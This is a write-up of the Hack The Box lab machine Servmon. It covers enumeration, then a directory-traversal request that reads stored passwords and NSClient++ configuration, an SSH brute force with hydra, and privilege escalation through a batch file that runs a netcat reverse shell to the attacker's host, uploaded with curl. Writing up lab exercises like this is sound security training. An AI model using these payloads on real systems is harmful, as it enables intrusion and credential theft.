Servmon is a recently retired box (11 Apr – 20 Jun) and though marked Easy it didn’t feel as easy as earlier Windows boxes, largely because of power creep; boxes become more difficult over time while retaining the same difficulty rating. The other problem was how unstable the box was; for some reason some ports weren’t marked open even though they should be. I found this only after I checked online and saw others encountered the same problem. Without those running services, the box is unexploitable. Fortunately after I switched regions I could find those running services and proceed.
When doing this box you may find that Chromium loads quicker than Firefox on Kali, so I installed it.
Lessons learned
- (Unintended) differences between HTB regions for the same box
- amap being too old to reliably trust
- Post-exploitation enumeration restrictions on recent Windows builds
- Dealing with Windows AV for file-transfer
Enumeration
This was what I saw in the first region
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-29 16:46:51 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 49667/tcp on 10.10.10.184 Discovered open port 135/tcp on 10.10.10.184 Discovered open port 445/tcp on 10.10.10.184 Discovered open port 5040/tcp on 10.10.10.184 Discovered open port 49666/tcp on 10.10.10.184 Discovered open port 49668/tcp on 10.10.10.184 Discovered open port 5666/tcp on 10.10.10.184 Discovered open port 7680/tcp on 10.10.10.184 Discovered open port 49665/tcp on 10.10.10.184 Discovered open port 21/tcp on 10.10.10.184 Discovered open port 49664/tcp on 10.10.10.184 Discovered open port 49669/tcp on 10.10.10.184 Discovered open port 8443/tcp on 10.10.10.184 Discovered open port 22/tcp on 10.10.10.184 Discovered open port 49670/tcp on 10.10.10.184
After switching regions, port 80 appears.
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-30 06:26:37 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 7680/tcp on 10.10.10.184 Discovered open port 49667/tcp on 10.10.10.184 Discovered open port 49669/tcp on 10.10.10.184 Discovered open port 49670/tcp on 10.10.10.184 Discovered open port 5666/tcp on 10.10.10.184 Discovered open port 8443/tcp on 10.10.10.184 Discovered open port 445/tcp on 10.10.10.184 Discovered open port 80/tcp on 10.10.10.184 Discovered open port 139/tcp on 10.10.10.184 Discovered open port 49664/tcp on 10.10.10.184 Discovered open port 49668/tcp on 10.10.10.184 Discovered open port 135/tcp on 10.10.10.184 Discovered open port 49665/tcp on 10.10.10.184 Discovered open port 21/tcp on 10.10.10.184 Discovered open port 22/tcp on 10.10.10.184 Discovered open port 5040/tcp on 10.10.10.184 Discovered open port 6063/tcp on 10.10.10.184 Discovered open port 49666/tcp on 10.10.10.184 Discovered open port 6699/tcp on 10.10.10.184
I spent a lot of time applying the right exploits to the wrong port only to discover this. The running services and ports are here.
FTP
We see an FTP server running, so run nmap’s FTP scripts against it.
root@Kali:~/HTB/Servmon# nmap -Pn -n -sV -p21 --script=ftp* 10.10.10.184 -e tun0 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 01:14 +08 NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument. Nmap scan report for 10.10.10.184 Host is up (0.0053s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM Users | ftp-brute: | Accounts: No valid accounts found |_ Statistics: Performed 50009 guesses in 93 seconds, average tps: 537.1 | ftp-syst: |_ SYST: Windows_NT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 93.50 seconds
This tells us anonymous access is allowed. So I logged in, found some notes and downloaded them.
root@Kali:~/HTB/Servmon# ftp -p 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> pwd 257 "/" is current directory. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,11). 125 Data connection already open; Transfer starting. 01-18-20 12:05PM Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,12). 125 Data connection already open; Transfer starting. 01-18-20 12:06PM Nadine 01-18-20 12:08PM Nathan 226 Transfer complete. ftp> cd Nadine 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,15). 125 Data connection already open; Transfer starting. 01-18-20 12:08PM 174 Confidential.txt 226 Transfer complete. ftp> mget Confidential.txt mget Confidential.txt? Y 227 Entering Passive Mode (10,10,10,184,194,20). 125 Data connection already open; Transfer starting. 226 Transfer complete. 174 bytes received in 0.00 secs (35.9851 kB/s) ftp> cd .. 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,21). 125 Data connection already open; Transfer starting. 01-18-20 12:06PM Nadine 01-18-20 12:08PM Nathan 226 Transfer complete. ftp> cd Nathan 250 CWD command successful. ftp> dir 227 Entering Passive Mode (10,10,10,184,194,22). 125 Data connection already open; Transfer starting. 01-18-20 12:10PM 186 Notes to do.txt 226 Transfer complete. ftp> mget "Notes to do.txt" mget Notes to do.txt? Y 227 Entering Passive Mode (10,10,10,184,194,24). 125 Data connection already open; Transfer starting. 226 Transfer complete.
Apart from these I also tested if I could do directory traversal cd ../../../../
, nope didn’t work. The notes read (with added newlines)
root@Kali:~/HTB/Servmon# cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine root@Kali:~/HTB/Servmon# cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Ok so we know a few things. First there’s a Passwords.txt on Nathan’s desktop which we can’t get to with anonymous FTP (I tried dir -a
). Then we see references to NVMS and NSClient, a clue on what software may be running.
SMB
Couldn’t find anything here. No null sessions were available. Afternote: When I was done with the box and watched IppSec’s video he shows that the discovered passswords worked with SMB.
root@Kali:~/HTB/Servmon# smbmap -H 10.10.10.184 [+] Finding open SMB ports.... [!] Authentication error occured [!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) [!] Authentication error on 10.10.10.184 root@Kali:~/HTB/Servmon# smbclient --no-pass -L //10.10.10.184 WARNING: The "syslog" option is deprecated WARNING: The "syslog" option is deprecated session setup failed: NT_STATUS_ACCESS_DENIED
Web services
Port 8443
I tried 8443 first (since I didn’t discover 80 until later) and found that amap (which was pretty old) didn’t identify this Web service properly
root@Kali:~/HTB/Servmon# amap 10.10.10.184 8443 amap v5.4 (www.thc.org/thc-amap) started at 2020-08-30 01:34:25 - APPLICATION MAPPING mode Unidentified ports: 10.10.10.184:8443/tcp (total 1). amap v5.4 finished at 2020-08-30 01:34:31 root@Kali:~/HTB/Servmon# curl http://10.10.10.184:8443/ curl: (56) Recv failure: Connection reset by peer
Nor did curl get redirected to the HTTPS website. But if you enter explicitly https://10.10.10.184:8443 you’ll see this
Strangely there’s no username required and I tried some obvious passwords like nadine, nathan, servmon, admin, password etc. none which worked. Googling NSClient tells us its a monitoring agent which fits the name Servmon pretty well. I couldn’t find any default passwords to use for NSClient either. searchsploit returns this
root@Kali:~/HTB/Servmon# searchsploit nsclient -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
But neither appears relevant; we don’t have creds nor are we already in. dirbuster hung when I tried, and anyway it didn’t find much.
Port 80
Page loaded this
Similarly we don’t have any passwords and in any case, Nathan’s note says they’ve been changed. searchsploit returned something interesting
root@Kali:~/HTB/Servmon# searchsploit nvms -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
The last result, a Python exploit was published a day after the box was released. So it’s probably not right to use it, since it would have been written just for the box. It seemed to be an automated exploit of the first result though. We can try this in Burp repeater
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: dataPort=6063 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Content-type: Content-Length: 92 Connection: close AuthInfo: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Ok we managed to do an LFI on Windows. Now what would be interesting is what we could view. Nadine’s note says that Passwords.txt was on Nathans desktop.
GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: dataPort=6063 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo: 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
We got a bunch of passwords. I tried them with NSClient login, but none succeeded. Now although not necessary at this stage, I had a look at the earlier privilege escalation exploit for NSClient and it says the Web administrator password is at c:\program files\nsclient++\nsclient.ini. So I used the LFI vulnerability to view it. We can see the password, but also understand why it returned a 403 not allowed error instead, namely because only localhost can login.
; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1
Exploitation – SSH login
We still have SSH to test. This is an odd service running on Windows, but anyway. We have two usernames and a list of passwords so let’s use hydra to bruteforce SSH logins, hopefully it doesn’t lock us out.
root@Kali:~/HTB/Servmon# cat users.txt Nadine Nathan root@Kali:~/HTB/Servmon# cat Passwords.txt 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ root@Kali:~/HTB/Servmon# hydra -L users.txt -P Passwords.txt 10.10.10.184 -t 4 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 17:53:59 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14 login tries (l:2/p:7), ~4 tries per task [DATA] attacking ssh://10.10.10.184:22/ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-30 17:54:03 root@Kali:~/HTB/Servmon# ssh nadine@10.10.10.184 nadine@10.10.10.184's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>
Great we’re in. Getting winPEAS to run was quite a headache. I found quickly that commands like systeminfo
, tasklist
were blocked
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist ERROR: Access denied
which is something increasingly true of newer Windows boxes. Ok let’s check the .NET version
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir C:\Windows\Microsoft.NET\Framework Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of C:\Windows\Microsoft.NET\Framework 19/03/2019 05:52 <DIR> . 19/03/2019 05:52 <DIR> .. 19/03/2019 05:46 7,680 sbscmp10.dll 19/03/2019 05:46 7,680 sbscmp20_mscorwks.dll 19/03/2019 05:46 7,680 sbscmp20_perfcounter.dll 19/03/2019 05:46 7,680 sbs_diasymreader.dll 19/03/2019 05:46 7,680 sbs_microsoft.jscript.dll 19/03/2019 05:46 7,680 sbs_mscordbi.dll 19/03/2019 05:46 7,680 sbs_mscorrc.dll 19/03/2019 05:46 7,680 sbs_mscorsec.dll 19/03/2019 05:46 7,680 sbs_system.configuration.install.dll 19/03/2019 05:46 7,680 sbs_system.data.dll 19/03/2019 05:46 7,680 sbs_system.enterpriseservices.dll 19/03/2019 05:46 7,680 sbs_wminet_utils.dll 19/03/2019 05:46 7,680 SharedReg12.dll 08/04/2020 23:21 <DIR> v1.0.3705 08/04/2020 23:21 <DIR> v1.1.4322 19/03/2019 05:52 <DIR> v2.0.50727 30/08/2020 07:36 <DIR> v4.0.30319 13 File(s) 99,840 bytes 6 Dir(s) 27,495,735,296 bytes free
4.0 so we have to use an older compiled winPEAS (current requires 4.5). Here I encountered a bunch of problems I couldn’t download winPEAS with certutil
or transfer with smbserver.py because Windows antivirus blocked it. What worked was what I discovered with Anthem here, namely that FTP download.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ftp ftp> open 10.10.14.18 Connected to 10.10.14.18. 220 pyftpdlib 1.2.0 ready. 530 Log in with USER and PASS first. User (10.10.14.18:(none)): anonymous 331 Username ok, send password. Password: 230 Login successful. ftp> GET winPEASany.exe 200 Active data connection established. 125 Data connection already open. Transfer starting. 226 Transfer complete. ftp: 237698 bytes received in 0.66Seconds 358.52Kbytes/sec. ftp> quit 221 Goodbye.
On Kali run the FTP server
root@Kali:~/HTB/Servmon# python -m pyftpdlib -p 21 -w /usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:262: RuntimeWarning: write permissions assigned to anonymous user. RuntimeWarning) [I 20-08-30 18:31:15] >>> starting FTP server on 0.0.0.0:21, pid=18441 <<< [I 20-08-30 18:31:15] poller: [I 20-08-30 18:31:15] masquerade (NAT) address: None [I 20-08-30 18:31:15] passive ports: None [I 20-08-30 18:31:15] use sendfile(2): True [I 20-08-30 18:31:45] 10.10.10.184:49721-[] FTP session opened (connect) [I 20-08-30 18:31:55] 10.10.10.184:49721-[anonymous] USER 'anonymous' logged in. [I 20-08-30 18:32:20] 10.10.10.184:49721-[anonymous] RETR /root/HTB/Servmon/winPEASany.exe completed=1 bytes=237698 seconds=0.694 [I 20-08-30 18:32:26] 10.10.10.184:49721-[anonymous] FTP session closed (disconnect).
Here as SSH provides an interactive shell, we can use FTP directly, otherwise in an non-interactive remote shell we can do what was done in Anthem, namely putting all the commands in one txt file and running FTP on that. Once I found a way to download files to the box, I hunted for a version of winPEAS which worked. The non-functional ones returned this error
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEASx64.exe cmd > winpeas.txt This version of C:\Users\Nadine\AppData\Local\Temp\winPEASx64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
Tried a few more, this ended up working.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEAS.exe cmd > winpeas.txt nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of C:\Users\Nadine\AppData\Local\Temp 30/08/2020 11:37 <DIR> . 30/08/2020 11:37 <DIR> .. 30/08/2020 11:24 59,392 nc.exe 30/08/2020 11:37 231,424 winPEAS.exe 30/08/2020 11:38 144,095 winpeas.txt 30/08/2020 11:32 237,698 winPEASany.exe 30/08/2020 11:35 237,186 winPEASx64.exe 5 File(s) 909,795 bytes 2 Dir(s) 27,495,587,840 bytes free
Other file transfer methods
I tested other file transfer methods, findings here. In conclusion, stick with Powershell’s DownloadFile
method, FTP and scp
(if Windows OpenSSH is installed). Unfortuntely winPEAS was quite uninformative this time round, it didn’t highlight any potentially exploitable vector. If you paid really close attention to non-Microsoft services you might see this
NSClient++ Monitoring Agent(MySolutions Nordic (Michael Medin) - NSClient++ Monitoring Agent)["C:\Program Files\NSClient++\nscp.exe" service --run --name nscp] - Autoload Monitoring agent for nagios (and others) used to respond to status queries
Restricted enumeration
But in general winPEAS had a hard time because the way it lists services is via Powershell’s Get-Service
:
nadine@SERVMON C:\Users\Nadine\Downloads>powershell.exe "Get-Service" Get-Service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges. At line:1 char:1 + Get-Service + ~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
on winPEAS we see
[X] Exception: Access denied System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges. ---> System.ComponentModel.Win32Exception: Access is denied --- End of inner exception stack trace --- at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManaqerAccess) at System.ServiceProcess.ServiceController.GetDataBaseHandleWithEnumerateAccess(String machineName) at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType) at System.ServiceProcess.ServiceController.GetServices() at d5.c(Dictionary`2 A_0) at d4.bs()
Commands like systeminfo
, tasklist
are restricted as well.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist ERROR: Access denied
But some are working on PS, such as Get-Process
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>Powershell.exe Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\Nadine\AppData\Local\Temp> PS C:\Users\Nadine\AppData\Local\Temp> Get-Process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 443 25 14560 31028 6252 1 ApplicationFrameHost 269 13 2464 13444 6704 1 browser_broker 89 5 2884 4688 0.48 604 0 cmd 107 6 2572 4424 0.06 4332 0 cmd 152 10 6728 12708 0.13 6376 0 conhost 157 10 6700 13004 7728 0 conhost 110 6 1300 5236 3.70 7956 0 conhost 619 21 1752 5196 408 0 csrss 400 17 1612 4756 496 1 csrss 386 15 3740 13764 4616 1 ctfmon 256 14 3924 13264 3564 0 dllhost 789 40 37732 71228 976 1 dwm 1649 62 24492 93060 5620 1 explorer 32 7 3404 7656 740 1 fontdrvhost 32 5 1340 3760 748 0 fontdrvhost 0 0 60 8 0 0 Idle 1157 23 5220 15528 636 0 lsass 173 15 4224 11460 2752 0 ManagementAgentHost 0 0 160 10412 1536 0 Memory Compression 760 45 39012 28220 7464 1 Microsoft.Photos 835 45 20068 72432 6328 1 MicrosoftEdge 488 20 5808 25280 7044 1 MicrosoftEdgeCP 263 13 3832 13000 5328 1 MicrosoftEdgeSH 221 13 2828 9972 4644 0 msdtc 739 71 177420 186952 2776 0 MsMpEng 137 9 1148 8748 0.16 3156 0 nc 192 33 3392 9264 4400 0 NisSrv 352 23 7348 19484 2660 0 nscp 2526 357 347536 118644 8080 1 NVMS-1000 624 34 96216 108592 4.31 7604 0 powershell 0 15 4572 26712 88 0 Registry 289 17 5416 21996 988 1 RuntimeBroker 126 8 1516 7408 1564 1 RuntimeBroker 133 9 1624 8128 2628 1 RuntimeBroker 407 19 6212 21204 2764 1 RuntimeBroker 215 11 2500 16016 6160 1 RuntimeBroker 139 8 1528 7400 6932 1 RuntimeBroker 269 14 2984 15296 7340 1 RuntimeBroker 255 16 4860 16324 8136 1 RuntimeBroker 776 43 19960 28332 2740 0 SearchIndexer 1072 68 71472 135400 4088 1 SearchUI 226 11 2736 14996 4224 1 SecurityHealthHost 410 16 4140 15512 6108 0 SecurityHealthService 154 10 1704 8828 7812 1 SecurityHealthSystray 641 11 4952 9592 628 0 services 89 6 3192 5964 3644 0 SgrmBroker 574 26 10664 45388 6440 1 ShellExperienceHost 555 18 6096 24768 3232 1 sihost 53 3 1148 1036 312 0 smss 422 21 5108 14748 2076 0 spoolsv 109 12 1712 6788 2688 0 sshd 120 9 2136 7044 0.89 6872 0 sshd 113 9 2040 7180 7716 0 sshd 588 27 18200 58148 648 1 StartMenuExperienceHost 157 7 1404 5704 332 0 svchost 287 13 3188 10832 340 0 svchost 158 10 1940 12136 596 0 svchost 214 12 2156 10040 660 0 svchost 86 5 908 3752 756 0 svchost 1169 22 11628 28836 828 0 svchost 1116 17 7048 14252 880 0 svchost 249 10 2172 7892 924 0 svchost 198 12 2184 12136 968 0 svchost 485 28 9328 19108 1032 0 svchost 415 14 13888 16632 1088 0 svchost 127 8 1412 7092 1152 0 svchost 138 19 3848 7796 1176 0 svchost 206 12 1692 7324 1192 0 svchost 219 10 2104 7244 1228 0 svchost 175 7 1248 5588 1352 0 svchost 226 13 2584 11784 1360 0 svchost 438 9 2900 8932 1368 0 svchost 242 12 34076 41512 1376 0 svchost 389 17 5640 15172 1468 0 svchost 367 15 4260 11828 1576 0 svchost 177 11 1864 8292 1600 0 svchost 267 13 2860 7740 1620 0 svchost 144 9 1516 6996 1708 0 svchost 175 10 1948 8064 1728 0 svchost 363 10 2584 8448 1840 0 svchost 211 10 1972 8532 1872 0 svchost 274 16 5564 19500 1884 0 svchost 190 15 6088 9844 1912 0 svchost 258 11 2576 9948 1944 0 svchost 126 10 1540 6252 1956 0 svchost 358 14 2268 9444 1968 0 svchost 225 12 2256 10916 2088 0 svchost 166 9 1772 6992 2124 0 svchost 428 32 9780 18908 2140 0 svchost 187 11 1984 8056 2196 0 svchost 263 13 2604 7700 2392 0 svchost 166 12 1660 7172 2400 0 svchost 203 23 2696 10092 2516 0 svchost 443 22 13944 28348 2524 0 svchost 344 21 27292 32352 2536 0 svchost 336 15 4524 11796 2556 0 svchost 421 16 8440 18568 2576 0 svchost 286 13 3748 15648 2640 1 svchost 209 12 2392 8768 2652 0 svchost 135 9 1552 6380 2672 0 svchost 128 7 1272 5344 2716 0 svchost 241 12 3128 17128 2804 0 svchost 483 18 3500 12724 2876 0 svchost 136 8 1584 6004 2896 0 svchost 378 23 3280 12000 3148 0 svchost 293 17 4192 15044 3256 0 svchost 307 18 4976 16596 3544 0 svchost 389 19 6600 39044 4104 1 svchost 253 13 3116 14520 4292 0 svchost 180 9 4532 12580 4480 0 svchost 169 9 1740 7836 4508 0 svchost 222 13 2880 12304 4528 0 svchost 340 42 4808 15808 4840 0 svchost 218 15 1968 7152 5132 0 svchost 241 12 3012 16132 5672 1 svchost 399 67 14716 20248 5812 0 svchost 190 12 2744 14848 6216 0 svchost 239 13 2852 11952 7120 0 svchost 227 12 2520 9732 7436 0 svchost 454 25 5024 20116 7524 1 svchost 188 10 3192 7660 7896 0 svchost 120 7 1324 5672 8004 0 svchost 2565 0 196 64 4 0 System 794 36 18324 660 2244 1 SystemSettings 260 27 4904 13796 4204 1 taskhostw 269 17 5104 14644 5488 1 taskhostw 483 21 33228 51996 7748 0 usocoreworker 178 13 4816 12924 2744 0 VGAuthService 407 24 9524 21840 2816 0 vmtoolsd 279 20 4300 16660 7880 1 vmtoolsd 129 9 1292 6780 5912 1 WatchDog 156 11 1312 6496 484 0 wininit 271 13 2908 12924 568 1 winlogon 524 36 15064 396 5908 1 WinStore.App 152 9 1564 7604 3528 0 WmiApSrv 345 16 9744 18636 3844 0 WmiPrvSE 463 24 12024 5360 7152 1 YourPhone 240 13 3304 14496 4328 1 YourPhoneServer
winPEAS also highlights that nadine’s Powershell history file is readable, which actually tells us how to escalate privileges (well in hindsight).
Priv esc
Priv esc for this box was quite tough, largely because the exploit write-up was quite difficult to follow (no screenshots or explanation of what was done). Plus, if you read this comment on IppSec’s video by the creator of the box he says that the intended route was actually through some RESTful API call, without even needing to login to NSClient. Nevertheless IppSec shows how to do it, and this is my summary:
As per the searchsploit results, read through the exploit. We first need to make NSClient Web app accessible. Noting from the config of nsclient.ini that only 127.0.0.1 is allowed to log in, we need to remote port forward this back to Kali’s ports which in effect makes the target service believe we are accessing the service on localhost rather than remotely.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ssh -l root -R 8443:127.0.0.1:8443 root@10.10.14.18 The authenticity of host '10.10.14.18 (10.10.14.18)' can't be established. ECDSA key fingerprint is SHA256:HRvXIeB7FuR8syEm3D1KDRx6s3O7n4jJQmXw4ald9PA. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.14.18' (ECDSA) to the list of known hosts. root@10.10.14.18's password: Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Sun Aug 30 13:15:05 2020 from 192.168.92.1 root@Kali:~#
Then we can run the browser (Chromium works better than Firefox here).
root@Kali:~/HTB/Servmon# chromium --no-sandbox
Navigate to https://localhost:8443 on Kali (note the HTTPS), and login with the password from nsclient.ini (ew2x6SsGTxjRwXOT)
Go to settings -> external scripts -> scripts -> Add new
The “key” field needs to be command and the value needs to be a path to an executable or batch script serving as the payload. In this case we can create a simple.bat file with this (download nc.exe to the target)
nadine@SERVMON C:\Users\Nadine\Downloads>echo @echo off > evil.bat nadine@SERVMON C:\Users\Nadine\Downloads>echo C:\Users\Nadine\Downloads\nc.exe 10.10.14.18 443 -e cmd.exe >> evil.bat nadine@SERVMON C:\Users\Nadine\Downloads>type evil.bat @echo off C:\Users\Nadine\Downloads\nc.exe 10.10.14.27 443 -e cmd.exe
IppSec explains in his video that the fields Key, Value are basically a new key, value for each entry for external scripts. For example in the default script
we see these blank fields
Adding key=command, value=C:\path\to\evil.bat results in a new field with command=C:\path\to\evil.bat
Once done it is necessary to reload the NSClient service. One can do it with the Web GUI
or cmd
nadine@SERVMON C:\Users\Nadine\Downloads>sc stop nscp SERVICE_NAME: nscp TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x2 WAIT_HINT : 0x0 nadine@SERVMON C:\Users\Nadine\Downloads>sc query nscp SERVICE_NAME: nscp TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 nadine@SERVMON C:\Users\Nadine\Downloads>sc start nscp SERVICE_NAME: nscp TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0xbb8 PID : 6324 FLAGS :
Strangely when I attempted to restart/stop the service the way the documentation intended it couldn’t work
nadine@SERVMON C:\Program Files\NSClient++>nscp service --stop ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied. nadine@SERVMON C:\Program Files\NSClient++>nscp service --restart ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied. ERROR: Service failed to start: OpenSCManager failed: 5: Access is denied.
Hopefully the service will not hang when restarted. When done, go to Queries and you’ll see that your script is there (default may not be present)
click on it then go to the Run tab
When you run it, you’ll get a SYSTEM shell if you have a listener up and running
root@Kali:~/HTB/Servmon# rlwrap -r nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.27] from (UNKNOWN) [10.10.10.184] 54975 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami & ipconfig whoami & ipconfig nt authority\system Windows IP Configuration Ethernet adapter Ethernet0 2: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::f00a:6ae5:a0c:f944 Temporary IPv6 Address. . . . . . : dead:beef::519b:a6b9:e1fd:4b16 Link-local IPv6 Address . . . . . : fe80::f00a:6ae5:a0c:f944%3 IPv4 Address. . . . . . . . . . . : 10.10.10.184 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9078%3 10.10.10.2 C:\Program Files\NSClient++>
Upload evil.bat via API
If you find the above too confusing (because the Web GUI sucks), you’re not alone. The upload can be done with the API calls. I did it this way
root@Kali:~/HTB/Servmon# cat evil.bat @echo off C:\Users\Nadine\Downloads\nc.exe 10.10.14.40 443 -e cmd.exe root@Kali:~/HTB/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat Enter host password for user 'admin': Added evil as scripts\evil.bat
Unfortunately I couldn’t find a way to trigger the script via API, even though there’s a command execute API so here yo have to login and you’ll see this in Queries
I didn’t have to add to scheduler or anything, and clicking Queries should run the .bat file, if not clicking its entry under Queries should.